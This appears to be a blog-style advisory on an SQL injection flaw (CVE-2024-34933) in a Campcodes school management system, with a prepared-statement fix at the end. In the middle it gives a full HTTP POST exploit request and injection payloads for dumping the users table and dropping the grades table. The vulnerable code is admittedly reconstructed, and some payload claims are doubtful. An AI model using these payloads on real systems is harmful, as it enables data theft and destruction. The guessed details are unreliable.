CVE-2024-34933 - SQL Injection in Campcodes Complete Web-Based School Management System 1. - Exploit, Analysis, and Protection

A critical SQL injection vulnerability (CVE-2024-34933) in Campcodes Complete Web-Based School Management System 1. lets attackers run harmful SQL commands. The problem is in the update_grade.php file, where user input isn’t checked before being added to a database query. This could let hackers steal data, bypass logins, or even destroy the database. Let’s dive in with examples and show you how it works — and how to fix it.

What is CVE-2024-34933?

CVE-2024-34933 is a security flaw found in Campcodes’ popular school management web application (). If an attacker messes with the admission_fee parameter when updating student grades, they can make the software run unwanted SQL commands.

The Vulnerable PHP Code

Here’s a simple version of what the problem code probably looks like inside model/update_grade.php:

// Vulnerable code in update_grade.php
$admission_fee = $_POST['admission_fee'];
$grade_id = $_POST['grade_id'];

// NO validation or sanitation on $admission_fee!
$query = "UPDATE grades SET admission_fee = '$admission_fee' WHERE grade_id = $grade_id";
mysqli_query($conn, $query);

Notice the values from the user (especially admission_fee) are put straight into the SQL query — no checks or cleaning.

Suppose a web form posts to update_grade.php. An attacker could send this

POST /model/update_grade.php HTTP/1.1
Host: victim-school.com
Content-Type: application/x-www-form-urlencoded

grade_id=1&admission_fee=100', grade_name='Hacked', is_active=1-- 

This crafts the SQL query as

UPDATE grades SET admission_fee = '100', grade_name='Hacked', is_active=1-- ' WHERE grade_id = 1

Everything after -- is ignored, so the query updates the grade’s name and other fields that were never meant to be set by the user.

If the attacker is clever, they could dump other data

admission_fee='; SELECT * FROM users WHERE '1'='1

Or even delete information

admission_fee='; DROP TABLE grades;--

Links and References

- Original script by Campcodes: https://www.campcodes.com/scripts/php/complete-web-based-school-management-system/
- Exploit DB Reference: https://www.exploit-db.com/exploits/52722
- Public Vulnerability listing: https://nvd.nist.gov/vuln/detail/CVE-2024-34933
- More on SQL Injection: OWASP SQL Injection

How to Fix It: The Secure Way

Never trust user input. Always clean and prepare info before using it in a query.

Use Prepared Statements (Safe Way)

// Secure code for update_grade.php
$admission_fee = $_POST['admission_fee'];
$grade_id = $_POST['grade_id'];

$stmt = $conn->prepare("UPDATE grades SET admission_fee = ? WHERE grade_id = ?");
$stmt->bind_param("di", $admission_fee, $grade_id);
$stmt->execute();

Final Words

Security is a must, especially for systems handling private school and student data. If you run Campcodes’ School Management System — or any similar PHP web tool — check your code now and patch any issues. Share this with your colleagues, and stay safe!


*Did you enjoy this article? Share it and protect your apps! For more exclusive vulnerability deep-dives, stay tuned.*

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 07/03/2024 02:00:58 UTC